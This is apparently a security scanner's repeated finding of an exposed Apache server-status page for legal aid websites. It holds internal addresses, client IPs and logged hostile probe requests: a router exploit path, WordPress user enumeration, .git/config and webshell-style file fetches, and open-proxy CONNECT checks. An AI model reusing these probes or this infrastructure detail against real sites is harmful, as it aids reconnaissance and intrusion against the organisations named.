55-424-0/0/27937. 0.001343193300.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.001343193200.00.00294.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 57-424-0/0/27670.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed1062787a
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 08-Nov-2025 13:12:25 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 579 Parent Server MPM Generation: 578 Server uptime: 577 days 20 hours 17 minutes 52 seconds Server load: 0.00 0.00 0.00 Total accesses: 13755052 - Total Traffic: 195.6 GB CPU Usage: u333.87 s28.97 cu0 cs0 - .000727% CPU load .276 requests/sec - 4205 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ___._._W____.................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-57830630/19/812103_ 3.59245500.01.0113452.42 45.156.128.131http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 1-57830980/50/789084_ 2.8039512670.00.8813061.16 167.94.138.176http/1.1atlantalegalaid.org:8080\x16\x03\x01 2-57830570/32/757469_ 7.29227900.01.7312922.51 176.65.149.182http/1.1atlantalegalaid.org:8080CONNECT ipv4-internet.yandex.net:443 HTTP/1.1 3-578-0/0/739622. 2.682094500.00.0012395.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-57830680/113/720051_ 5.78395300.02.4011875.61 167.94.138.176http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 5-578-0/0/699374. 2.312097200.00.0011552.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-57831110/41/660147_ 9.1839481490.02.9410886.55 167.94.138.176http/1.1atlantalegalaid.org:8080\x16\x03\x01 7-578311625/122/635182W 19.620029.65.8510385.75 130.176.208.143http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 8-57831210/44/603172_ 8.89367900.02.999797.63 185.247.137.117http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 9-57830730/17/583230_ 4.0639532440.00.809206.13 167.94.138.176http/1.1atlantalegalaid.org:8080PRI * HTTP/2.0 10-57834880/51/514156_ 3.36395000.00.878745.59 167.94.138.176http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 11-57834930/30/478486_ 7.30316300.02.107894.17 200.115.28.74http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 12-577-0/0/414905. 8.66244442560.00.006592.90 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api/gql HTTP/1.1 13-577-0/0/328727. 0.462851100.00.004786.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-577-0/0/289451. 7.98244442570.00.004305.15 70.132.4.80http/1.1atlantalegalaid.org:8080POST /graphql/api HTTP/1.1 15-576-0/0/265212. 0.0016326200.00.003777.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-575-0/0/230461. 1.641972433240.00.003442.34 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 17-575-0/0/167581. 0.0024517000.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-575-0/0/145436. 0.0024516800.00.002064.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-575-0/0/137595. 0.0024516700.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-574-0/0/128258. 0.0031914000.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-574-0/0/116729. 0.0031913800.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-574-0/0/121130. 0.0031913700.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-574-0/0/106104. 0.0031913900.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-574-0/0/108735. 1.342836442620.00.001366.53 185.242.226.58http/1.1atlantalegalaid.org:8080\x16\x03\x01 25-567-0/0/86000. 0.0090739100.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00213854800.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00213854700.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00213854600.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00213854400.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00213854500.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00213854300.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82859022500.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00866162300.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15855974400.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0685780436620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23857804300.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00866165800.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00866165600.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32857804310080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00866165700.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00866165500.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00866165400.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00866165300.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00866165200.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00866165100.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001325399000.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001325398900.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001325398800.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001325398700.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001325398600.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001325398500.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001325398400.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001325398300.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001325398200.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001325398100.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed8de41930
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 07-Nov-2025 02:47:18 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 577 Parent Server MPM Generation: 576 Server uptime: 576 days 9 hours 52 minutes 44 seconds Server load: 0.00 0.00 0.00 Total accesses: 13752533 - Total Traffic: 195.5 GB CPU Usage: u311.92 s26.18 cu0 cs0 - .000679% CPU load .276 requests/sec - 4214 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ____.___._..W_.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-576233250/28/811909_ 4.40414100.01.3313443.97 205.210.31.155http/1.1atlantalegalaid.org:8080\x16\x03\x01 1-576233300/10/788905_ 0.87381800.00.2713055.26 196.251.87.155http/1.1atlantalegalaid.org:8080POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1 2-576204330/91/757256_ 12.92732100.03.8012912.74 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 3-576204380/65/739302_ 6.5741413050.01.9112383.47 205.210.31.155http/1.1atlantalegalaid.org:8080\x16\x03\x01 4-576-0/0/719799. 6.403935600.00.0011866.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-576204280/113/699202_ 10.19452400.03.0811544.90 194.187.178.248http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 6-576227740/107/659882_ 1.92166200.00.6510874.96 176.65.149.19http/1.1atlantalegalaid.org:8080GET /login HTTP/1.1 7-576227790/91/634906_ 4.221196400.01.2910371.41 3.172.35.142http/1.1elearning.alas.org:8080GET /sitemap.xml HTTP/1.1 8-576-0/0/603005. 0.053935700.00.009789.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-576231670/29/583091_ 4.29793300.01.339200.35 176.65.149.19http/1.1atlantalegalaid.org:8080GET /login HTTP/1.1 10-576-0/0/514035. 1.723737800.00.008742.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-576-0/0/478434. 1.733737900.00.007891.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-5762318225/57/414834W 4.650029.61.396589.60 130.176.208.143http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 13-576204430/168/328710_ 9.29452400.02.794786.06 194.187.178.74http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 14-576-0/0/289370. 0.003935800.00.004302.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-576-0/0/265212. 0.003935400.00.003777.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-575-0/0/230461. 1.64733353240.00.003442.34 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 17-575-0/0/167581. 0.0012126200.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-575-0/0/145436. 0.0012126000.00.002064.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-575-0/0/137595. 0.0012125900.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-574-0/0/128258. 0.0019523200.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-574-0/0/116729. 0.0019523000.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-574-0/0/121130. 0.0019522900.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-574-0/0/106104. 0.0019523100.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-574-0/0/108735. 1.341597362620.00.001366.53 185.242.226.58http/1.1atlantalegalaid.org:8080\x16\x03\x01 25-567-0/0/86000. 0.0078348400.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00201464000.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00201463900.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00201463800.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00201463600.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00201463700.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00201463500.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82846631800.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00853771500.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15843583600.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0684541356620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23845413500.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00853775000.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00853774800.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32845413510080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00853774900.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00853774700.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00853774600.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00853774500.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00853774400.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00853774300.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001313008200.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001313008100.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001313008000.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001313007900.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001313007800.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001313007700.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001313007600.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001313007500.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001313007400.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001313007300.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed409babb3
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Wednesday, 05-Nov-2025 10:00:31 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 576 Parent Server MPM Generation: 575 Server uptime: 574 days 17 hours 5 minutes 57 seconds Server load: 0.00 0.00 0.00 Total accesses: 13750320 - Total Traffic: 195.4 GB CPU Usage: u308.16 s27.75 cu0 cs0 - .000676% CPU load .277 requests/sec - 4225 B/second - 14.9 kB/request 1 requests currently being processed, 7 idle workers ____W___........................................................ ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-575123010/39/811737_ 7.8857816720.02.9113439.49 70.132.1.135http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-575123060/24/788788_ 6.7157825750.01.8913051.36 70.132.1.135http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1 2-575130600/11/757055_ 3.69137900.00.6812907.26 198.235.24.214http/1.1atlantalegalaid.org:8080GET / HTTP/1.0 3-575131780/26/739158_ 2.80533000.02.1812379.48 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-5751230025/34/719622W 2.250029.60.9711862.70 130.176.208.143http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 5-575123110/76/699023_ 5.266600.00.8711540.53 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 6-575123120/23/659695_ 7.95235700.02.1510862.83 176.65.149.19http/1.1atlantalegalaid.org:8080GET /login HTTP/1.1 7-575131870/24/634709_ 4.24419940.01.4210368.85 15.158.17.170http/1.1elearning.alas.org:8080GET /theme/image.php/boost/theme/1564407846/favicon HTTP/1.1 8-574-0/0/602840. 1.661292910.00.009787.43 66.132.153.134http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 9-574-0/0/582999. 3.63129294060.00.009197.86 18.68.37.73http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 10-574-0/0/514007. 0.004843300.00.008742.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-574-0/0/478407. 6.984842000.00.007890.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-574-0/0/414769. 5.884840600.00.006588.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-574-0/0/328441. 0.004843200.00.004782.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-574-0/0/289362. 5.114842100.00.004302.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-574-0/0/265129. 0.004843000.00.003777.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-574-0/0/230362. 4.634841900.00.003432.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-574-0/0/167580. 0.004842800.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-574-0/0/145435. 0.004842700.00.002064.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-574-0/0/137594. 0.004842600.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-574-0/0/128258. 0.004842500.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-574-0/0/116729. 0.004842300.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-574-0/0/121130. 0.004842200.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-574-0/0/106104. 0.004842400.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-574-0/0/108735. 1.34129292620.00.001366.53 185.242.226.58http/1.1atlantalegalaid.org:8080\x16\x03\x01 25-567-0/0/86000. 0.0063667600.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00186783300.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00186783200.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00186783100.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00186782900.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00186783000.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00186782800.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82831951100.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00839090800.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15828902900.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0683073286620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23830732800.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00839094300.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00839094100.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32830732810080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00839094200.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00839094000.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00839093900.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00839093800.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00839093700.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00839093600.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001298327500.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001298327400.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001298327300.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001298327200.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001298327100.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001298327000.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001298326900.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001298326800.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001298326700.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001298326600.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed262eb3bd
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 03-Nov-2025 12:11:48 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 574 Parent Server MPM Generation: 573 Server uptime: 572 days 19 hours 17 minutes 14 seconds Server load: 0.00 0.00 0.00 Total accesses: 13747920 - Total Traffic: 195.3 GB CPU Usage: u293.19 s25.3 cu0 cs0 - .000644% CPU load .278 requests/sec - 4236 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers _______.W._._................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-573296960/61/811500_ 5.752410.01.3613431.23 130.176.208.143http/1.1legalaidconnections.org:8080GET / HTTP/1.1 1-573296410/57/788444_ 4.4427302590.01.2413044.55 130.176.187.239http/1.1atlantalegalaid.org:8080GET /xmrlpc.php HTTP/1.1 2-573304210/11/756796_ 1.75138000.00.9812890.10 130.176.187.246http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 3-573304300/59/738934_ 5.22210000.01.5512364.02 15.158.226.76http/1.1elearning.alas.org:8080GET /.git/config HTTP/1.1 4-573304370/14/719433_ 1.75159900.00.5011848.41 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 5-573311440/2/698874_ 0.4527322640.00.1311537.40 130.176.187.230http/1.1atlantalegalaid.org:8080GET /wsa.php HTTP/1.1 6-573311490/1/659560_ 0.0084900.00.0010858.25 176.65.149.19http/1.1atlantalegalaid.org:8080GET /login HTTP/1.1 7-572-0/0/634623. 4.153532500.00.0010365.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-5732963024/37/602710W 1.720028.11.299784.16 130.176.208.143http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 9-572-0/0/582867. 7.023533000.00.009184.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-573296290/56/513922_ 5.1227352600.01.108729.89 130.176.187.241http/1.1atlantalegalaid.org:8080GET /wp-includes/ID3/ HTTP/1.1 11-572-0/0/478315. 0.152080600.00.007888.19 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 12-573296350/18/414646_ 4.0327332650.00.886565.53 130.176.187.245http/1.1atlantalegalaid.org:8080GET /wp.php HTTP/1.1 13-572-0/0/328373. 0.003532400.00.004780.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-572-0/0/289321. 0.003532300.00.004301.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-572-0/0/265107. 0.003532600.00.003775.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-572-0/0/230322. 4.623532900.00.003431.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-572-0/0/167577. 3.563532800.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-573-0/0/145432. 2.86272900.00.002064.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-572-0/0/137591. 0.002080600.00.002103.38 173.249.217.7http/1.1 20-571-0/0/128255. 0.0018185100.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-571-0/0/116726. 0.0018185000.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-567-0/0/121127. 0.0047175700.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-567-0/0/106101. 0.0047175400.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-567-0/0/108712. 0.0047175600.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-567-0/0/86000. 0.0047175300.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00170291000.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00170290900.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00170290800.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00170290600.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00170290700.00.00687.29 